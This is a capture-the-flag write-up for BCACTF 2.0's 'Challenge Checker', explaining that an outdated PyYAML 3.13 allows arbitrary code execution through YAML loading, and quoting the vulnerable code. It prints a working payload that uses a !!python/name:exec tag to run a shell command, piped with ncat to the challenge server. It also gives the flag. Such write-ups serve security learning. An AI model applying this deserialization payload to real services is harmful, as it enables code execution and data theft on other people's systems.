Tags: misc pyyaml 


# Challenge Checker

#### Category : misc
#### Points : 150 points (70 solves)
#### Author : anli, Edward Feng

## Challenge
I made this challenge checker to automate away ed's job. Maybe you can get a flag if you give it enough delicious yams...

- [chall.yaml](https://objects.bcactf.com/bcactf2/challenge-checker/chall.yaml)
- [requirements.txt](https://objects.bcactf.com/bcactf2/challenge-checker/requirements.txt)
- [verify.py](https://objects.bcactf.com/bcactf2/challenge-checker/verify.py)
- `nc misc.bcactf.com 49153`

## Solution
Taking a look at `requirements.txt`, we find that it is using an old version of PyYAML(3.13).

When I searched for vulnerabilites, I found that PyYAML below 5.4 is vulnerable to arbitrary code execution due to the `full_load` method.

More Information :
[PyYAML Vulnerabilities](https://snyk.io/vuln/SNYK-PYTHON-PYYAML-590151)

I also found a writeup for the same at https://hackmd.io/@harrier/uiuctf20

#### Vulnerable Code :
The vulnerable function is the `check` function
def check(raw_data) -> "Tuple[list[str], list[str]]":
data = load(raw_data)
if not isinstance(data, dict):
raise Exception("Data must be a dictionary")

This function is being called after accepting `raw_data` from the user :
if __name__ == "__main__":
cprint("Paste in your chall.yaml file, then send an EOF:", "cyan", attrs=["bold"])
raw_data = sys.stdin.read()
errors, warnings = check(raw_data)

#### Getting flag.txt
I came up with the following payload to extract `flag.txt` :
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "import os; os.system('cat flag.txt')"

Getting the flag :
$ cat payload| ncat misc.bcactf.com 49153

Paste in your chall.yaml file, then send an EOF or two empty lines:
Fatal error: Data must be a dictionary


flag : `bcactf{3d_r3ally_l1k35s_his_yams_c00ked_j5fc9g}`

#### Note
I used ncat instead of nc because there was some problem while sending EOF with nc.

[Originial Writeup](https://github.com/p1xxxel/ctf-writeups/tree/main/2021/BCACTF%202.0/Challenge%20Checker)